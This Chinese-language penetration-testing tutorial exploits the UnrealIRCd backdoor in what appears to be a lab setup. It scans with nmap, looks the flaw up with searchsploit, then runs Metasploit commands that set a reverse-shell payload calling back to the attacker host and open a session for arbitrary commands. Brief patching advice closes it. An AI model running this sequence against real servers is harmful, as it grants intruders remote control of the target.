6-25漏洞利用-irc后门利用

irc介绍

IRC是Internet Relay Chat 的英文缩写，中文一般称为互联网中继聊天。它是由芬兰人Jarkko Oikarinen于1988年首创的一种网络聊天协议。经过十年的发展，目前世界上有超过60个国家提供了IRC的服务，IRC的工作原理非常简单，您只要在自己的PC上运行客户端软件，然后通过因特网以IRC协议连接到一台IRC服务器上即可。这个时候，就可以通过irc聊天，它的特点是速度非常之快，聊天时几乎没有延迟现象，并且只占用很小的带宽资源，使得速度更快。所有用户可以在一个被称为"Channel"（频道）的地方就某一话题进行交谈或密谈。每个IRC的使用者都有一个Nickname（昵称），用来区分不同用户。

默认情况下，irc服务器运行在6667端口。

探测目标irc

使用nmap -sV -p 6667 IP地址 探测目标irc版本信息

nmap -sV -p 6667 192.168.42.137

可以看到，很快探测出目标版本信息

msf利用irc后门

使用searchsploit查找可以利用的POC

searchsploit UnrealIRCd

可以查看到，当前软件是否存在问题，我们在这里选择Backdoor Command Execution（Metasploit），进行利用

use exploit/unix/irc/unreal_ircd_3281_backdoor
show options
set payload cmd/unix/reverse
show options
set lhost 192.168.42.128
exploit

利用msf中对于irc后门连接的模块，连接shell。

可以看到，探测完成，建立了session，我们可以在这里执行任意命令

修复防御

1、升级软件版本

2、更换其他软件